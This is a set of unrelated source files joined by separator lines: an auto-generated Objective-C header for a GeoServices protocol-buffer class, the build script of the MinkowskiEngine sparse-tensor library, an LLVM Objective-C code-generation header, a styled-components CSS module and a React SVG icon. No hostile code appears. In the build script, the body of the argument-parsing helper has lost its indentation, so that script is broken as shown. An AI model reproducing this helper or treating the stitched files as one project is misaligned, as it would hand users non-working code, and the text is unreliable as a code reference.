* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. Updated by Kevin Bradley.
*/
#import <GeoServices/GeoServices-Structs.h>
#import <ProtocolBuffer/PBCodable.h>
#import <libobjc.A.dylib/NSCopying.h>
@class PBUnknownFields;
// Protocol-buffer message for a rating-based place filter (GeoServices).
// NOTE(review): classdump-generated header - only the generic PBCodable
// plumbing is declared; any concrete rating fields are not visible here.
@interface GEOPDRatingFilter : PBCodable <NSCopying> {
	PBUnknownFields* _unknownFields;
}
@property (nonatomic,readonly) PBUnknownFields * unknownFields;
// Validation, equality, hashing, copying, and description.
+(BOOL)isValid:(id)arg1 ;
-(BOOL)isEqual:(id)arg1 ;
-(unsigned long long)hash;
-(id)copyWithZone:(NSZone*)arg1 ;
-(id)description;
// Dictionary and JSON representations.
-(id)initWithDictionary:(id)arg1 ;
-(id)dictionaryRepresentation;
// Wire (de)serialization and message merging/copying.
-(BOOL)readFrom:(id)arg1 ;
-(void)writeTo:(id)arg1 ;
-(void)mergeFrom:(id)arg1 ;
-(void)copyTo:(id)arg1 ;
-(void)readAll:(BOOL)arg1 ;
-(id)jsonRepresentation;
-(id)initWithJSON:(id)arg1 ;
// Accessors for fields not consumed by the declared schema.
-(PBUnknownFields *)unknownFields;
-(void)clearUnknownFields:(BOOL)arg1 ;
@end
|
r"""
Parse additional arguments along with the setup.py arguments such as install, build, distribute, sdist, etc.
Usage:
python setup.py install <additional_flags>..<additional_flags> <additional_arg>=<value>..<additional_arg>=<value>
export CXX=<C++ compiler>; python setup.py install <additional_flags>..<additional_flags> <additional_arg>=<value>..<additional_arg>=<value>
Examples:
python setup.py install --force_cuda --cuda_home=/usr/local/cuda
export CXX=g++7; python setup.py install --force_cuda --cuda_home=/usr/local/cuda
Additional flags:
--cpu_only: Force building only a CPU version. However, if
torch.cuda.is_available() is False, it will default to CPU_ONLY.
--force_cuda: If torch.cuda.is_available() is false, but you have a working
    nvcc, compile cuda files. --force_cuda will supersede --cpu_only.
Additional arguments:
--blas=<value> : type of blas library to use for CPU matrix multiplications.
Options: [openblas, mkl, atlas, blas]. By default, it will use the first
numpy blas library it finds.
--cuda_home=<value> : a directory that contains <value>/bin/nvcc and
<value>/lib64/libcudart.so. By default, use
`torch.utils.cpp_extension._find_cuda_home()`.
--blas_include_dirs=<comma_separated_values> : additional include dirs. Only
activated when --blas=<value> is set.
--blas_library_dirs=<comma_separated_values> : additional library dirs. Only
activated when --blas=<value> is set.
"""
import sys

# Refuse to run on unsupported interpreters before importing anything heavier.
if sys.version_info < (3, 6):
    sys.stdout.write(
        "Minkowski Engine requires Python 3.6 or higher. Please use anaconda https://www.anaconda.com/distribution/ for an isolated python environment.\n"
    )
    sys.exit(1)
# torch must be importable at build time: the extension links against its
# C++ API via torch.utils.cpp_extension below.
try:
    import torch
except ImportError:
    raise ImportError("Pytorch not found. Please install pytorch first.")
import codecs
import os
import re
import subprocess
from sys import argv, platform
from setuptools import setup
from torch.utils.cpp_extension import CppExtension, CUDAExtension, BuildExtension
from distutils.sysconfig import get_python_inc

# Platform gate: Windows is unsupported; on macOS force the Homebrew LLVM
# clang so the required C++ standard features are available.
if platform == "win32":
    raise ImportError("Windows is currently not supported.")
elif platform == "darwin":
    # Set the distutils to use clang instead of g++ for valid std
    os.environ["CC"] = "/usr/local/opt/llvm/bin/clang"
    os.environ["CXX"] = "/usr/local/opt/llvm/bin/clang"

# Absolute directory containing this setup.py; used to resolve relative paths.
here = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
    """Return the text contents of the file at *parts*, joined under ``here``."""
    target = os.path.join(here, *parts)
    with codecs.open(target, "r") as handle:
        return handle.read()
def find_version(*file_paths):
    """Extract the ``__version__`` string from the given source file.

    Raises RuntimeError when no version assignment is found.
    """
    contents = read(*file_paths)
    match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", contents, re.M)
    if match is None:
        raise RuntimeError("Unable to find version string.")
    return match.group(1)
def run_command(*args):
    """Run *args* as an external command; raise CalledProcessError on failure."""
    cmd = list(args)
    subprocess.check_call(cmd)
def _argparse(pattern, argv, is_flag=True):
if is_flag:
found = pattern in argv
if found:
argv.remove(pattern)
return found, argv
else:
arr = [arg for arg in argv if pattern in arg]
if len(arr) == 0: # not found
return False, argv
else:
assert "=" in arr[0], f"{arr[0]} requires a value."
argv.remove(arr[0])
return arr[0].split("=")[1], argv
# ---- Parse custom options (removed from argv before setuptools sees them) ----
# For cpu only build
CPU_ONLY, argv = _argparse("--cpu_only", argv)
# Fall back to a CPU-only build when CUDA is unavailable at build time.
CPU_ONLY = CPU_ONLY or not torch.cuda.is_available()
KEEP_OBJS, argv = _argparse("--keep_objs", argv)  # skip "make clean"
FORCE_CUDA, argv = _argparse("--force_cuda", argv)  # build CUDA despite torch reporting no GPU
# args with return value
CUDA_HOME, argv = _argparse("--cuda_home", argv, False)
BLAS, argv = _argparse("--blas", argv, False)
BLAS_INCLUDE_DIRS, argv = _argparse("--blas_include_dirs", argv, False)
BLAS_LIBRARY_DIRS, argv = _argparse("--blas_library_dirs", argv, False)

# Assume a CUDA build unless overridden below.
Extension = CUDAExtension
compile_args = [
    "make",
    "-j%d" % min(os.cpu_count(), 12),  # parallel compilation
    "PYTHON=" + sys.executable,  # curr python
]
extra_compile_args = ["-Wno-deprecated-declarations"]
extra_link_args = []
libraries = ["minkowski"]
# extra_compile_args+=['-g'] # Uncomment for debugging

if CPU_ONLY and not FORCE_CUDA:
    # --force_cuda wins over --cpu_only (see module docstring).
    print("--------------------------------")
    print("| WARNING: CPU_ONLY build set |")
    print("--------------------------------")
    compile_args += ["CPU_ONLY=1"]
    extra_compile_args += ["-DCPU_ONLY"]
    Extension = CppExtension
else:
    # system python installation
    libraries.append("cusparse")

if not (CUDA_HOME is False):  # False when not set, str otherwise
    print(f"Using CUDA_HOME={CUDA_HOME}")
    compile_args += [f"CUDA_HOME={CUDA_HOME}"]

if KEEP_OBJS:
    print("\nUsing built objects")

# BLAS selection: honor an explicit --blas choice, otherwise probe numpy's
# system info for the first available library in this preference order.
BLAS_LIST = ["openblas", "mkl", "atlas", "blas"]
if not (BLAS is False):  # False only when not set, str otherwise
    assert BLAS in BLAS_LIST
    libraries.append(BLAS)
    if not (BLAS_INCLUDE_DIRS is False):
        compile_args += [f"BLAS_INCLUDE_DIRS={BLAS_INCLUDE_DIRS}"]
    if not (BLAS_LIBRARY_DIRS is False):
        # Embed an rpath so the extension finds the BLAS shared library at runtime.
        extra_link_args += [f"-Wl,-rpath,{BLAS_LIBRARY_DIRS}"]
else:
    # find the default BLAS library
    import numpy.distutils.system_info as sysinfo

    # Search blas in this order
    for blas in BLAS_LIST:
        if "libraries" in sysinfo.get_info(blas):
            BLAS = blas
            libraries += sysinfo.get_info(blas)["libraries"]
            break
    else:
        # BLAS not found
        raise ImportError(
            ' \
\nBLAS not found from numpy.distutils.system_info.get_info. \
\nPlease specify BLAS with: python setup.py install --blas=openblas" \
\nfor more information, please visit https://github.com/StanfordVL/MinkowskiEngine/wiki/Installation'
        )

print(f"\nUsing BLAS={BLAS}")
compile_args += ["BLAS=" + BLAS]

if "darwin" in platform:
    extra_compile_args += ["-stdlib=libc++"]

# Build the native library via the project Makefile before setuptools runs;
# the Extension below links against the objects it produces (in ./objs).
if not KEEP_OBJS:
    run_command("make", "clean")
run_command(*compile_args)
# Python interface
setup(
    name="MinkowskiEngine",
    # Version is read from the __version__ string in MinkowskiEngine/__init__.py.
    version=find_version("MinkowskiEngine", "__init__.py"),
    install_requires=["torch", "numpy"],
    packages=["MinkowskiEngine", "MinkowskiEngine.utils", "MinkowskiEngine.modules"],
    package_dir={"MinkowskiEngine": "./MinkowskiEngine"},
    ext_modules=[
        Extension(  # CUDAExtension or CppExtension, chosen above
            name="MinkowskiEngineBackend",
            include_dirs=[here, get_python_inc() + "/.."],
            # Link against the objects produced by the Makefile run above.
            library_dirs=["objs"],
            sources=["pybind/minkowski.cpp",],
            libraries=libraries,
            extra_compile_args=extra_compile_args,
            extra_link_args=extra_link_args,
        )
    ],
    # BuildExtension wires the torch-specific compile/link flags into the build.
    cmdclass={"build_ext": BuildExtension},
    author="Christopher Choy",
    author_email="chrischoy@ai.stanford.edu",
    description="a convolutional neural network library for sparse tensors",
    long_description=read("README.md"),
    long_description_content_type="text/markdown",
    url="https://github.com/StanfordVL/MinkowskiEngine",
    keywords=[
        "pytorch",
        "Minkowski Engine",
        "Sparse Tensor",
        "Convolutional Neural Networks",
        "3D Vision",
        "Deep Learning",
    ],
    zip_safe=False,
    classifiers=[
        # https://pypi.org/classifiers/
        "Environment :: Console",
        "Development Status :: 3 - Alpha",
        "Intended Audience :: Developers",
        "Intended Audience :: Other Audience",
        "Intended Audience :: Science/Research",
        "License :: OSI Approved :: MIT License",
        "Natural Language :: English",
        "Programming Language :: C++",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Topic :: Multimedia :: Graphics",
        "Topic :: Scientific/Engineering",
        "Topic :: Scientific/Engineering :: Artificial Intelligence",
        "Topic :: Scientific/Engineering :: Mathematics",
        "Topic :: Scientific/Engineering :: Physics",
        "Topic :: Scientific/Engineering :: Visualization",
    ],
    python_requires=">=3.6",
)
|
//===----- CGObjCRuntime.h - Interface to ObjC Runtimes ---------*- C++ -*-===//
//
// The LLVM37 Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This provides an abstract class for Objective-C code generation. Concrete
// subclasses of this implement code generation for specific Objective-C
// runtime libraries.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM37_CLANG_LIB_CODEGEN_CGOBJCRUNTIME_H
#define LLVM37_CLANG_LIB_CODEGEN_CGOBJCRUNTIME_H
#include "CGBuilder.h"
#include "CGCall.h"
#include "CGValue.h"
#include "clang/AST/DeclObjC.h"
#include "clang/Basic/IdentifierTable.h" // Selector
namespace llvm37 {
class Constant;
class Function;
class Module;
class StructLayout;
class StructType;
class Type;
class Value;
}
namespace clang {
namespace CodeGen {
class CodeGenFunction;
}
class FieldDecl;
class ObjCAtTryStmt;
class ObjCAtThrowStmt;
class ObjCAtSynchronizedStmt;
class ObjCContainerDecl;
class ObjCCategoryImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCProtocolDecl;
class Selector;
class ObjCIvarDecl;
class ObjCStringLiteral;
class BlockDeclRefExpr;
namespace CodeGen {
class CodeGenModule;
class CGBlockInfo;
// FIXME: Several methods should be pure virtual but aren't to avoid the
// partially-implemented subclass breaking.

/// Implements runtime-specific code generation functions.
class CGObjCRuntime {
protected:
  CodeGen::CodeGenModule &CGM;
  CGObjCRuntime(CodeGen::CodeGenModule &CGM) : CGM(CGM) {}

  // Utility functions for unified ivar access. These need to
  // eventually be folded into other places (the structure layout
  // code).

  /// Compute an offset to the given ivar, suitable for passing to
  /// EmitValueForIvarAtOffset. Note that the correct handling of
  /// bit-fields is carefully coordinated by these two, use caution!
  ///
  /// The latter overload is suitable for computing the offset of a
  /// synthesized ivar.
  uint64_t ComputeIvarBaseOffset(CodeGen::CodeGenModule &CGM,
                                 const ObjCInterfaceDecl *OID,
                                 const ObjCIvarDecl *Ivar);
  uint64_t ComputeIvarBaseOffset(CodeGen::CodeGenModule &CGM,
                                 const ObjCImplementationDecl *OID,
                                 const ObjCIvarDecl *Ivar);

  /// Emit an l-value for the ivar located at \p Offset bytes from
  /// \p BaseValue, coordinating bit-field handling with
  /// ComputeIvarBaseOffset (see note above).
  LValue EmitValueForIvarAtOffset(CodeGen::CodeGenFunction &CGF,
                                  const ObjCInterfaceDecl *OID,
                                  llvm37::Value *BaseValue,
                                  const ObjCIvarDecl *Ivar,
                                  unsigned CVRQualifiers,
                                  llvm37::Value *Offset);

  /// Emits a try / catch statement. This function is intended to be called by
  /// subclasses, and provides a generic mechanism for generating these, which
  /// should be usable by all runtimes. The caller must provide the functions
  /// to call when entering and exiting a \@catch() block, and the function
  /// used to rethrow exceptions. If the begin and end catch functions are
  /// NULL, then the function assumes that the EH personality function provides
  /// the thrown object directly.
  void EmitTryCatchStmt(CodeGenFunction &CGF,
                        const ObjCAtTryStmt &S,
                        llvm37::Constant *beginCatchFn,
                        llvm37::Constant *endCatchFn,
                        llvm37::Constant *exceptionRethrowFn);

  /// Emits an \@synchronize() statement, using the \p syncEnterFn and
  /// \p syncExitFn arguments as the functions called to lock and unlock
  /// the object. This function can be called by subclasses that use
  /// zero-cost exception handling.
  void EmitAtSynchronizedStmt(CodeGenFunction &CGF,
                              const ObjCAtSynchronizedStmt &S,
                              llvm37::Function *syncEnterFn,
                              llvm37::Function *syncExitFn);

public:
  virtual ~CGObjCRuntime();

  /// Generate the function required to register all Objective-C components in
  /// this compilation unit with the runtime library.
  virtual llvm37::Function *ModuleInitFunction() = 0;

  /// Get a selector for the specified name and type values. The
  /// return value should have the LLVM37 type for pointer-to
  /// ASTContext::getObjCSelType().
  virtual llvm37::Value *GetSelector(CodeGenFunction &CGF,
                                     Selector Sel, bool lval=false) = 0;

  /// Get a typed selector.
  virtual llvm37::Value *GetSelector(CodeGenFunction &CGF,
                                     const ObjCMethodDecl *Method) = 0;

  /// Get the type constant to catch for the given ObjC pointer type.
  /// This is used externally to implement catching ObjC types in C++.
  /// Runtimes which don't support this should add the appropriate
  /// error to Sema.
  virtual llvm37::Constant *GetEHType(QualType T) = 0;

  /// Generate a constant string object.
  virtual llvm37::Constant *GenerateConstantString(const StringLiteral *) = 0;

  /// Generate a category. A category contains a list of methods (and
  /// accompanying metadata) and a list of protocols.
  virtual void GenerateCategory(const ObjCCategoryImplDecl *OCD) = 0;

  /// Generate a class structure for this class.
  virtual void GenerateClass(const ObjCImplementationDecl *OID) = 0;

  /// Register a class alias.
  virtual void RegisterAlias(const ObjCCompatibleAliasDecl *OAD) = 0;

  /// Generate an Objective-C message send operation.
  ///
  /// \param Method - The method being called, this may be null if synthesizing
  /// a property setter or getter.
  virtual CodeGen::RValue
  GenerateMessageSend(CodeGen::CodeGenFunction &CGF,
                      ReturnValueSlot ReturnSlot,
                      QualType ResultType,
                      Selector Sel,
                      llvm37::Value *Receiver,
                      const CallArgList &CallArgs,
                      const ObjCInterfaceDecl *Class = nullptr,
                      const ObjCMethodDecl *Method = nullptr) = 0;

  /// Generate an Objective-C message send operation to the super
  /// class initiated in a method for Class and with the given Self
  /// object.
  ///
  /// \param Method - The method being called, this may be null if synthesizing
  /// a property setter or getter.
  virtual CodeGen::RValue
  GenerateMessageSendSuper(CodeGen::CodeGenFunction &CGF,
                           ReturnValueSlot ReturnSlot,
                           QualType ResultType,
                           Selector Sel,
                           const ObjCInterfaceDecl *Class,
                           bool isCategoryImpl,
                           llvm37::Value *Self,
                           bool IsClassMessage,
                           const CallArgList &CallArgs,
                           const ObjCMethodDecl *Method = nullptr) = 0;

  /// Emit the code to return the named protocol as an object, as in a
  /// \@protocol expression.
  virtual llvm37::Value *GenerateProtocolRef(CodeGenFunction &CGF,
                                             const ObjCProtocolDecl *OPD) = 0;

  /// Generate the named protocol. Protocols contain method metadata but no
  /// implementations.
  virtual void GenerateProtocol(const ObjCProtocolDecl *OPD) = 0;

  /// Generate a function preamble for a method with the specified
  /// types.
  // FIXME: Currently this just generates the Function definition, but really
  // this should also be generating the loads of the parameters, as the runtime
  // should have full control over how parameters are passed.
  virtual llvm37::Function *GenerateMethod(const ObjCMethodDecl *OMD,
                                           const ObjCContainerDecl *CD) = 0;

  /// Return the runtime function for getting properties.
  virtual llvm37::Constant *GetPropertyGetFunction() = 0;

  /// Return the runtime function for setting properties.
  virtual llvm37::Constant *GetPropertySetFunction() = 0;

  /// Return the runtime function for optimized setting properties.
  virtual llvm37::Constant *GetOptimizedPropertySetFunction(bool atomic,
                                                            bool copy) = 0;

  // API for atomic copying of qualified aggregates in getter.
  virtual llvm37::Constant *GetGetStructFunction() = 0;
  // API for atomic copying of qualified aggregates in setter.
  virtual llvm37::Constant *GetSetStructFunction() = 0;
  /// API for atomic copying of qualified aggregates with non-trivial copy
  /// assignment (c++) in setter.
  virtual llvm37::Constant *GetCppAtomicObjectSetFunction() = 0;
  /// API for atomic copying of qualified aggregates with non-trivial copy
  /// assignment (c++) in getter.
  virtual llvm37::Constant *GetCppAtomicObjectGetFunction() = 0;

  /// GetClass - Return a reference to the class for the given
  /// interface decl.
  virtual llvm37::Value *GetClass(CodeGenFunction &CGF,
                                  const ObjCInterfaceDecl *OID) = 0;

  /// Return a reference to the NSAutoreleasePool class. The default
  /// implementation aborts; ABIs without this support must not reach it.
  virtual llvm37::Value *EmitNSAutoreleasePoolClassRef(CodeGenFunction &CGF) {
    llvm37_unreachable("autoreleasepool unsupported in this ABI");
  }

  /// EnumerationMutationFunction - Return the function that's called by the
  /// compiler when a mutation is detected during foreach iteration.
  virtual llvm37::Constant *EnumerationMutationFunction() = 0;

  // Statement emission entry points for \@synchronized, \@try, and \@throw.
  virtual void EmitSynchronizedStmt(CodeGen::CodeGenFunction &CGF,
                                    const ObjCAtSynchronizedStmt &S) = 0;
  virtual void EmitTryStmt(CodeGen::CodeGenFunction &CGF,
                           const ObjCAtTryStmt &S) = 0;
  virtual void EmitThrowStmt(CodeGen::CodeGenFunction &CGF,
                             const ObjCAtThrowStmt &S,
                             bool ClearInsertionPoint=true) = 0;

  // Runtime-specific load/store hooks for weak, global, ivar, and
  // strong-cast assignments.
  virtual llvm37::Value *EmitObjCWeakRead(CodeGen::CodeGenFunction &CGF,
                                          llvm37::Value *AddrWeakObj) = 0;
  virtual void EmitObjCWeakAssign(CodeGen::CodeGenFunction &CGF,
                                  llvm37::Value *src, llvm37::Value *dest) = 0;
  virtual void EmitObjCGlobalAssign(CodeGen::CodeGenFunction &CGF,
                                    llvm37::Value *src, llvm37::Value *dest,
                                    bool threadlocal=false) = 0;
  virtual void EmitObjCIvarAssign(CodeGen::CodeGenFunction &CGF,
                                  llvm37::Value *src, llvm37::Value *dest,
                                  llvm37::Value *ivarOffset) = 0;
  virtual void EmitObjCStrongCastAssign(CodeGen::CodeGenFunction &CGF,
                                        llvm37::Value *src, llvm37::Value *dest) = 0;

  virtual LValue EmitObjCValueForIvar(CodeGen::CodeGenFunction &CGF,
                                      QualType ObjectTy,
                                      llvm37::Value *BaseValue,
                                      const ObjCIvarDecl *Ivar,
                                      unsigned CVRQualifiers) = 0;
  virtual llvm37::Value *EmitIvarOffset(CodeGen::CodeGenFunction &CGF,
                                        const ObjCInterfaceDecl *Interface,
                                        const ObjCIvarDecl *Ivar) = 0;
  virtual void EmitGCMemmoveCollectable(CodeGen::CodeGenFunction &CGF,
                                        llvm37::Value *DestPtr,
                                        llvm37::Value *SrcPtr,
                                        llvm37::Value *Size) = 0;
  // Block and __block-variable layout emission for GC and reference counting.
  virtual llvm37::Constant *BuildGCBlockLayout(CodeGen::CodeGenModule &CGM,
                                               const CodeGen::CGBlockInfo &blockInfo) = 0;
  virtual llvm37::Constant *BuildRCBlockLayout(CodeGen::CodeGenModule &CGM,
                                               const CodeGen::CGBlockInfo &blockInfo) = 0;
  virtual llvm37::Constant *BuildByrefLayout(CodeGen::CodeGenModule &CGM,
                                             QualType T) = 0;
  virtual llvm37::GlobalVariable *GetClassGlobal(const std::string &Name,
                                                 bool Weak = false) = 0;

  /// Pairs the computed call ABI info with the function-pointer type used
  /// to invoke the runtime's messenger function.
  struct MessageSendInfo {
    const CGFunctionInfo &CallInfo;
    llvm37::PointerType *MessengerType;

    MessageSendInfo(const CGFunctionInfo &callInfo,
                    llvm37::PointerType *messengerType)
      : CallInfo(callInfo), MessengerType(messengerType) {}
  };

  MessageSendInfo getMessageSendInfo(const ObjCMethodDecl *method,
                                     QualType resultType,
                                     CallArgList &callArgs);

  // FIXME: This probably shouldn't be here, but the code to compute
  // it is here.
  unsigned ComputeBitfieldBitOffset(CodeGen::CodeGenModule &CGM,
                                    const ObjCInterfaceDecl *ID,
                                    const ObjCIvarDecl *Ivar);
};
/// Creates an instance of an Objective-C runtime class.
// TODO: This should include some way of selecting which runtime to target.
CGObjCRuntime *CreateGNUObjCRuntime(CodeGenModule &CGM);
CGObjCRuntime *CreateMacObjCRuntime(CodeGenModule &CGM);

} // namespace CodeGen
} // namespace clang

#endif
|
import styled from 'styled-components';
// Flex wrapper that horizontally centers its content.
// Fix: the original declared "margin-botton", an invalid property name that
// browsers silently ignore, so the intended bottom margin was never applied.
export const ContentContainer = styled.div`
  display: flex;
  justify-content: center!important;
  margin-bottom: 2rem;
`;
// Centered form card: fixed at 80% of the flex container's width, with a
// translucent coral border and rounded corners.
export const Form = styled.form`
  flex: 0 0 80%;
  max-width: 80%;
  padding: 2rem 2rem 1rem 2rem;
  border: solid 1px rgba(255, 129, 110, 0.4);
  border-radius: .25rem;
  text-align: center;
`;
|
import React from 'react';
import createSvgIcon from './utils/createSvgIcon';
// Material-style "SportsOutlined" icon: the SVG path data is wrapped into a
// ready-to-use React icon component by the createSvgIcon helper.
export default createSvgIcon(
  <React.Fragment><path d="M11.23 6c-1.66 0-3.22.66-4.36 1.73C6.54 6.73 5.61 6 4.5 6 3.12 6 2 7.12 2 8.5S3.12 11 4.5 11c.21 0 .41-.03.61-.08-.05.25-.09.51-.1.78-.18 3.68 2.95 6.68 6.68 6.27 2.55-.28 4.68-2.26 5.19-4.77.15-.71.15-1.4.06-2.06-.09-.6.38-1.13.99-1.13H22V6H11.23zM4.5 9c-.28 0-.5-.22-.5-.5s.22-.5.5-.5.5.22.5.5-.22.5-.5.5zm6.5 6c-1.66 0-3-1.34-3-3s1.34-3 3-3 3 1.34 3 3-1.34 3-3 3z" /><circle cx="11" cy="12" r="2" /></React.Fragment>
, 'SportsOutlined');
|